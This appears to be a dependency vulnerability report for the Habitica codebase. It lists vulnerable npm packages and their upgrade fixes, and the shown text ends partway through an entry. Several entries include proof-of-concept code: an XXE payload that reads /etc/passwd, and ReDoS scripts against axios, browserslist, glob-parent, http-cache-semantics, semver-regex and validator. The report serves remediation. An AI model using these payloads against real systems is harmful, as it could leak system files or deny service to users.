Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2
Overview
Affected versions of this package are vulnerable to Open Redirect due to missing verification of requested URLs. It allowed a victim to be redirected to a UNIX socket.
Remediation
Upgrade got to version 11.8.5, 12.1.0 or higher.
References
medium severity
- Vulnerable module: xmldom
- Introduced through: in-app-purchase@1.11.4
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xmldom@0.1.19
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › in-app-purchase@1.11.4 › xml-crypto@0.10.1 › xmldom@0.1.19
Overview
xmldom is an A pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module.
Affected versions of this package are vulnerable to XML External Entity (XXE) Injection. Does not correctly preserve system identifiers, FPIs or namespaces when repeatedly parsing and serializing maliciously crafted documents.
Details
XXE Injection is a type of attack against an application that parses XML input. XML is a markup language that defines a set of rules for encoding documents in a format that is both human-readable and machine-readable. By default, many XML processors allow specification of an external entity, a URI that is dereferenced and evaluated during XML processing. When an XML document is being parsed, the parser can make a request and include the content at the specified URI inside of the XML document.
Attacks can include disclosing local files, which may contain sensitive data such as passwords or private user data, using file: schemes or relative paths in the system identifier.
For example, below is a sample XML document, containing an XML element- username.
<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<username>John</username>
</xml>
An external XML entity - xxe, is defined using a system identifier and present within a DOCTYPE header. These entities can access local or remote content. For example the below code contains an external XML entity that would fetch the content of /etc/passwd and display it to the user rendered by username.
<xml>
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<username>&xxe;</username>
</xml>
Other XXE Injection attacks can access local resources that may not stop returning data, possibly impacting application availability and leading to Denial of Service.
Remediation
Upgrade xmldom to version 0.5.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: @slack/webhook@6.1.0, apple-auth@1.0.9 and others
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › @slack/webhook@6.1.0 › axios@0.21.4Remediation: Upgrade to @slack/webhook@7.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › apple-auth@1.0.9 › axios@0.21.4
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › amplitude@6.0.0 › axios@0.26.1
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). An attacker can deplete system resources by providing a manipulated string as input to the format method, causing the regular expression to exhibit a time complexity of O(n^2). This makes the server to become unable to provide normal service due to the excessive cost and time wasted in processing vulnerable regular expressions.
PoC
const axios = require('axios');
console.time('t1');
axios.defaults.baseURL = '/'.repeat(10000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t1');
console.time('t2');
axios.defaults.baseURL = '/'.repeat(100000) + 'a/';
axios.get('/a').then(()=>{}).catch(()=>{});
console.timeEnd('t2');
/* stdout
t1: 60.826ms
t2: 5.826s
*/
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade axios to version 0.29.0, 1.6.3 or higher.
References
medium severity
- Vulnerable module: browserslist
- Introduced through: babel-preset-env@1.7.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › babel-preset-env@1.7.0 › browserslist@3.2.8
Overview
browserslist is a Share target browsers between different front-end tools, like Autoprefixer, Stylelint and babel-env-preset
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) during parsing of queries.
PoC by Yeting Li
var browserslist = require("browserslist")
function build_attack(n) {
var ret = "> "
for (var i = 0; i < n; i++) {
ret += "1"
}
return ret + "!";
}
// browserslist('> 1%')
//browserslist(build_attack(500000))
for(var i = 1; i <= 500000; i++) {
if (i % 1000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
try{
browserslist(attack_str);
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
catch(e){
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms");
}
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade browserslist to version 4.16.5 or higher.
References
medium severity
- Vulnerable module: glob-parent
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › glob-parent@3.1.0Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › vinyl-fs@3.0.3 › glob-stream@6.1.0 › glob-parent@3.1.0Remediation: Upgrade to gulp@5.0.0.
Overview
glob-parent is a package that helps extracting the non-magic parent path from a glob string.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The enclosure regex used to check for strings ending in enclosure containing path separator.
PoC by Yeting Li
var globParent = require("glob-parent")
function build_attack(n) {
var ret = "{"
for (var i = 0; i < n; i++) {
ret += "/"
}
return ret;
}
globParent(build_attack(5000));
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade glob-parent to version 5.1.2 or higher.
References
medium severity
- Vulnerable module: http-cache-semantics
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › download@7.1.0 › got@8.3.2 › cacheable-request@2.1.4 › http-cache-semantics@3.8.1
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS). The issue can be exploited via malicious request header values sent to a server, when that server reads the cache policy from the request using this library.
PoC
Run the following script in Node.js after installing the http-cache-semantics NPM package:
const CachePolicy = require("http-cache-semantics");
for (let i = 0; i <= 5; i++) {
const attack = "a" + " ".repeat(i * 7000) +
"z";
const start = performance.now();
new CachePolicy({
headers: {},
}, {
headers: {
"cache-control": attack,
},
});
console.log(`${attack.length}: ${performance.now() - start}ms`);
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade http-cache-semantics to version 4.1.1 or higher.
References
medium severity
- Vulnerable module: micromatch
- Introduced through: gulp@4.0.2
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › anymatch@2.0.0 › micromatch@3.1.10Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › anymatch@2.0.0 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › glob-watcher@5.0.5 › chokidar@2.1.8 › readdirp@2.2.1 › micromatch@3.1.10
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › liftoff@3.1.0 › findup-sync@3.0.0 › micromatch@3.1.10Remediation: Upgrade to gulp@5.0.0.
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp@4.0.2 › gulp-cli@2.3.0 › matchdep@2.0.0 › findup-sync@2.0.0 › micromatch@3.1.10
Overview
Affected versions of this package are vulnerable to Inefficient Regular Expression Complexity due to the use of unsafe pattern configurations that allow greedy matching through the micromatch.braces() function. An attacker can cause the application to hang or slow down by passing a malicious payload that triggers extensive backtracking in regular expression processing.
Remediation
Upgrade micromatch to version 4.0.8 or higher.
References
medium severity
- Vulnerable module: ramda
- Introduced through: eslint-plugin-mocha@5.3.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › eslint-plugin-mocha@5.3.0 › ramda@0.26.1Remediation: Upgrade to eslint-plugin-mocha@6.3.0.
Overview
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) in source/trim.js within variable ws.
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade ramda to version 0.27.2 or higher.
References
medium severity
- Vulnerable module: semver-regex
- Introduced through: gulp-imagemin@7.1.0
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-gifsicle@7.0.0 › gifsicle@5.3.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-mozjpeg@8.0.0 › mozjpeg@6.0.1 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › gulp-imagemin@7.1.0 › imagemin-optipng@7.1.0 › optipng-bin@6.0.0 › bin-wrapper@4.1.0 › bin-version-check@4.0.0 › bin-version@3.1.0 › find-versions@3.2.0 › semver-regex@2.0.0
Overview
semver-regex is a Regular expression for matching semver versions
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) due to improper usage of regex in the semverRegex() function.
PoC
'0.0.1-' + '-.--'.repeat(i) + ' '
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade semver-regex to version 3.1.4, 4.0.3 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input in the isURL() function which does not take into account : as the delimiter in browsers. An attackers can bypass protocol and domain validation by crafting URLs that exploit the discrepancy in protocol parsing that can lead to Cross-Site Scripting and Open Redirect attacks.
Remediation
Upgrade validator to version 13.15.20 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
Introduced through: habitica@HabitRPG/habitica#94bda303850cbf0744e18b81c67f9d599e213b86 › express-validator@5.3.1 › validator@10.11.0Remediation: Upgrade to express-validator@6.5.0.
Overview
validator is a library of string validators and sanitizers.
Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the isSlug function
PoC
var validator = require("validator")
function build_attack(n) {
var ret = "111"
for (var i = 0; i < n; i++) {
ret += "a"
}
return ret+"_";
}
for(var i = 1; i <= 50000; i++) {
if (i % 10000 == 0) {
var time = Date.now();
var attack_str = build_attack(i)
validator.isSlug(attack_str)
var time_cost = Date.now() - time;
console.log("attack_str.length: " + attack_str.length + ": " + time_cost+" ms")
}
}
Details
Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.
The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.
Let’s take the following regular expression as an example:
regex = /A(B|C+)+D/
This regular expression accomplishes the following:
AThe string must start with the letter 'A'(B|C+)+The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the+matches one or more times). The+at the end of this section states that we can look for one or more matches of this section.DFinally, we ensure this section of the string ends with a 'D'
The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD
It most cases, it doesn't take very long for a regex engine to find a match:
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total
$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total
The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.
Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.
Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:
- CCC
- CC+C
- C+CC
- C+C+C.
The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.
From there, the number of steps the engine must use to validate a string just continues to grow.
| String | Number of C's | Number of steps |
|---|---|---|
| ACCCX | 3 | 38 |
| ACCCCX | 4 | 71 |
| ACCCCCX | 5 | 136 |
| ACCCCCCCCCCCCCCX | 14 | 65,553 |
By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.
Remediation
Upgrade validator to version 13.6.0 or higher.
References
medium severity
- Vulnerable module: validator
- Introduced through: express-validator@5.3.1
Detailed paths
-
